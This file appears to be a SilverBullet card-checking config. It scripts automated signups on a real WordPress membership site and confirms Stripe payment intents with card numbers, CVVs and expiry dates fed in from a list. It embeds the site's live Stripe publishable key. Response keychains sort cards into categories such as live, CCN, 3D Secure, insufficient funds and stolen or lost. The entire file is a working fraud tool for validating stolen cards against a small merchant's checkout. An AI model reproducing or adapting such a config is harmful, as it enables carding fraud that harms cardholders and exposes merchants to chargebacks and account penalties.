[SETTINGS]
{
  "Name": "75",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2023-05-21T02:25:41.5668858+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.3 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "75",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#cc1 FUNCTION Substring "0" "4" "<cc>" -> VAR "cc1" 

#cc2 FUNCTION Substring "4" "4" "<cc>" -> VAR "cc2" 

#cc3 FUNCTION Substring "8" "4" "<cc>" -> VAR "cc3" 

#cc4 FUNCTION Substring "12" "4" "<cc>" -> VAR "cc4" 

#cc FUNCTION Constant "<cc1>+<cc2>+<cc3>+<cc4>" -> VAR "cc" 

#email FUNCTION RandomString "?l?l?l?l?l?l?l?l?l?l?l@gmail.com" -> VAR "email" 

#user FUNCTION RandomString "?l?l?l?l?l?l?l?l?l?l?l" -> VAR "user" 

#guid FUNCTION GenerateGUID -> VAR "guid" 

#muid FUNCTION GenerateGUID -> VAR "muid" 

#sid FUNCTION GenerateGUID -> VAR "sid" 

REQUEST POST "https://alignedlivingtasmania.com/wp-admin/admin-ajax.php" Multipart 
  
  STRINGCONTENT "mepr_product_id: 4435" 
  STRINGCONTENT "mepr_transaction_id: " 
  STRINGCONTENT "user_first_name: mmm" 
  STRINGCONTENT "user_last_name: mmmmmmmmm" 
  STRINGCONTENT "mepr_email: <email>" 
  STRINGCONTENT "mepr-geo-country: " 
  STRINGCONTENT "user_email: <email>" 
  STRINGCONTENT "mepr_user_password: " 
  STRINGCONTENT "mepr_user_password_confirm: " 
  STRINGCONTENT "mp-pass-strength: 0" 
  STRINGCONTENT "mepr_coupon_code: " 
  STRINGCONTENT "mepr_payment_method: qijfxo-68q" 
  STRINGCONTENT "mepr_no_val: " 
  STRINGCONTENT "action: mepr_stripe_create_payment_client_secret" 
  STRINGCONTENT "mepr_payment_method: qijfxo-68q" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#secret PARSE "<SOURCE>" LR "\"client_secret\":\"" "\"" -> VAR "secret" 

#pi PARSE "<SOURCE>" LR "\"client_secret\":\"" "_secret_" -> VAR "pi" 

REQUEST POST "https://api.stripe.com/v1/payment_intents/<pi>/confirm" 
  CONTENT "return_url=https%3A%2F%2Falignedlivingtasmania.com%2Fthank-you-courses%2F%3Fmembership%3Dloops-of-alignment-and-action-course%26membership_id%3D4435%26transaction_id%3D1357&payment_method_data[billing_details][address][country]=EG&payment_method_data[billing_details][name]=mmm+mmmmmmmmm&payment_method_data[type]=card&payment_method_data[card][number]=<cc>&payment_method_data[card][cvc]=<cvv>&payment_method_data[card][exp_year]=<ano>&payment_method_data[card][exp_month]=<mes>&payment_method_data[payment_user_agent]=stripe.js%2F0caf90759d%3B+stripe-js-v3%2F0caf90759d%3B+payment-element&payment_method_data[time_on_page]=317748&payment_method_data[guid]=<guid>&payment_method_data[muid]=<muid>&payment_method_data[sid]=<sid>&expected_payment_method_type=card&use_stripe_sdk=true&key=pk_live_51HVoLNF3gINAQ3Omq63S6Xwxyz3dfJKJkijeHwj1NU0na73Xe6ruD2tzm17H5T0fgECKOztNdw5CamQfXzGA3F1s00LhgPYdKw&_stripe_version=2022-11-15&client_secret=<secret>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#message PARSE "<SOURCE>" LR "\"message\": \"" "\"" CreateEmpty=FALSE -> CAP "message" 

#code PARSE "<SOURCE>" LR "\"decline_code\": \"" "\"" CreateEmpty=FALSE -> CAP "code" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Card is declined" 
    KEY "Your card does not support this type of purchase" 
    KEY "card_not_supported" 
    KEY "Your card is not supported." 
    KEY "transaction_not_allowed" 
    KEY "Your card was declined." 
    KEY "incorrect_number" 
    KEY "service_not_allowed" 
    KEY "do_not_honor" 
    KEY "generic_decline" 
    KEY "paraneter_invaild_empty" 
    KEY "lock_timeout" 
    KEY "Card is declined by your bank, please contact them for additional primaryrmation." 
    KEY "fraudulent" 
    KEY "was not found on this server." 
    KEY "paraneter_invaild_integer." 
    KEY "Your Card was declined" 
    KEY "Your card's expiration year is invaild." 
    KEY "Your card was declined.\"],\"donation_id\"" 
    KEY "Generic Decline" 
    KEY "invalid_expiry_month" 
    KEY "Your card's expiration year is invalid" 
    KEY "Your card's expiration month is invalid" 
    KEY "Your card's security code is invalid" 
    KEY "Your card number is incorrect." 
    KEY "Your card was declined." 
    KEY "Your card is not supported for this currency." 
    KEY "Your card is not supported" 
    KEY "invalid_account" 
    KEY "generic_decline" 
    KEY "Your card has expired." 
    KEY "expired_card" 
    KEY "Invalid account" 
    KEY "Invalid amount" 
    KEY "Your card was declined. Please contact your bank to resolve this issue and try purchasing again." 
    KEY "Payment data validation failed" 
    KEY "Saved payment method." 
    KEY "You cannot accept payments using this API as it is no longer supported in India." 
    KEY "card_decline_rate_limit_exceeded" 
    KEY "subscription_payment_intent_requires_action" 
    KEY "You have exceeded the maximum number of declines on this card in the last 24 hour period." 
  KEYCHAIN Success OR 
    KEY "Thank you" 
    KEY "Payment successful" 
    KEY "Thank you for Your Donation!" 
    KEY "\"cvc_check\": \"pass\"" 
    KEY "status\": \"succeeded\"" 
    KEY "Merci" 
    KEY "Successful" 
    KEY "Successfully" 
    KEY "Merci pour votre achat." 
    KEY "{\"success\":true" 
    KEY "{\"is_error\":0,\"" 
    KEY "\"pi_id\":\"pi" 
    KEY "receipt_url" 
    KEY "Thank_you" 
    KEY "\"status\": \"succeeded\"" 
    KEY "[#Alive]" 
    KEY "[#CVV]" 
    KEY "https://pay.stripe.com/receipts/" 
    KEY "approved_by_network" 
    KEY "\\\"cvc_check\\\": \\\"pass\\\"" 
    KEY "Thank you for supporting" 
    KEY "Merci" 
    KEY "\\\"status\\\": \\\"succeeded\\\"" 
    KEY "Thanks for your support." 
    KEY "Thank you for your payment." 
    KEY "Ti ringraziamo moltissimo per la tua donazione." 
  KEYCHAIN Retry OR 
    KEY "This object cannot be accessed right now because another API resquest or Stripe process is currently accessing " 
    KEY "An error occurred while processing your card. Try again in a little bit." 
    KEY "We're sorry, but we're unable to serve your resquest." 
    KEY "Contains The zip or postal code for your billing address." 
    KEY "The zip code you supllied failed vaildation" 
    KEY "We are not able to process your payment request at the moment. Please try again later" 
    KEY "<title>Please Wait... | Cloudflare</title>" 
    KEY "Unrecognized request URL" 
    KEY "content=\"0;/.well-known/captcha/\"></" 
    KEY "Invalid nonce." 
    KEY "Unknown error generating account. Please contact us to set up your membership." 
    KEY "Too Many Requests." 
    KEY "Something went wrong" 
    KEY "503" 
    KEY "There has been a critical error on this website." 
    KEY "Error establishing a database connection" 
    KEY "Nonce verification failed" 
    KEY "502 Bad Gateway" 
    KEY "502" 
  KEYCHAIN Custom "CCN" OR 
    KEY "Your card's security code is incorrect" 
    KEY "Your card's security code is invalid." 
    KEY "[#CCN]" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "stolen_card" 
    KEY "lost_card" 
  KEYCHAIN Ban OR 
    KEY "Unexpected error communicating with Stripe" 
    KEY "Request rate limit exceeded." 
    KEY "We are not able to process your payment request at the moment. Please try again later." 
  KEYCHAIN Custom "3D" OR 
    KEY "card_error_authentication_required" 
    KEY "This payment require 3D Secure authentication!" 
    KEY "\"status\": \"requires_action" 
    KEY "requires_action\":true" 
    KEY "redirect_to\":\"https:\\/\\/hooks.stripe.com\\/3d_secure_2\\/hosted?" 
    KEY "https:\\/\\/hooks.stripe.com\\/redirect\\/authenticate" 
    KEY "https:\\/\\/hooks.stripe.com\\/3d_secure_2\\/hosted?" 
  KEYCHAIN Custom "NSF" OR 
    KEY "Your card has insufficient funds." 

